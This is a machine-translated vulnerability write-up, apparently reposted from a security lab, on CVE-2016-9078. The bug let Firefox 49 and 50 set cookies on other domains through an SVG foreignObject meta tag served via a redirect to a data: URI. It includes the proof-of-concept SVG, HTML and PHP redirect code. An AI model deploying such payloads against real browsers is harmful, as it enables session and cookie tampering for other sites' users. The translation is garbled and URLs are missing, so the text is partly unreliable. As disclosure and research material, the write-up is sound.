Firefox - SVG cross domain cookie vulnerability (CVE-2016-9078)

ID SSV:92568
Type seebug
Reporter Root
Modified 2016-12-08T00:00:00


Original link:

Author: the Alex Inführ

Translation: Holic (know Chong Yu 404 Safety laboratory) , this article has additions and changes

Note: the vulnerability only affects Firefox 49 and 50 version, details see the official announcement of.

SVG - through the img tag to set cross-domain cookies

I recently have an understanding of to, the browser allows the use of meta tags to set the cookie. I'm not sure if I forget about this feature, or before I've never used it before. Given the previous research by SVG, I decided to give it a try. The SVG standard does not include the meta tag, but it support the foreignobject tag.

<foreignObject> in the SVG element allows the inclusion of external XML namespaces, the namespace of the graphical content by a different user agent to draw.

From mdn of a simple example shows how the SVG file using the XHTML namespace.

<foreignObject width="100" height="50" requiredExtensions=""> <!-- XHTML content goes here --> <body xmlns=""> <p>Here is a paragraph that requires word wrap</p> </body> </foreignObject>


I modified the sample code, and point your browser to the following SVG: a

<svg xmlns=''> <circle r='100'> </circle> <foreignObject> <html xmlns=''> <meta http-equiv='Set-Cookie' content='ppp=qqq' /> </html> </foreignObject> </svg>

Host a domain now have a cookie ppp=qqq to.

The next step is to try it out, if another field in the load this SVG file, what will happen to it:

// Domain: <! DOCTYPE html> the <body> <img src=""> </body>

Through the meta Set cookie

Unfortunately, the cookie is set to instead the.

Redirect + data uri

Make it force the last tip is to use the data: Protocol handler and redirect. Suppose domain has the following code.

<! DOCTYPE html> the <body> <img src=""> </body> the server returned the following response code:


HTTP 302 Found Location: data:image/svg+xml, ``

Note: in php you can use the following code: php header("Location: data:image/svg+xml,<svg xmlns=''><circle r='100'></circle><foreignObject><html xmlns=''><meta http-equiv='Set-Cookie' content='svg2=2222qqq' /></html></foreignObject></svg>");

Use of data: host domain set the cookie

Once I'm in the Firefox browser to open the test case, you will be to set a Cookie. This will for web brings many different vulnerabilities, including allowing included from external/third party websites the image.

In by firefox team to investigate this issue during the period, there has been another problem that the public can be directly read:

Currently also in determining the bug reward.

I must thank my Cure53 friends, help me research this vulnerability, especially Masato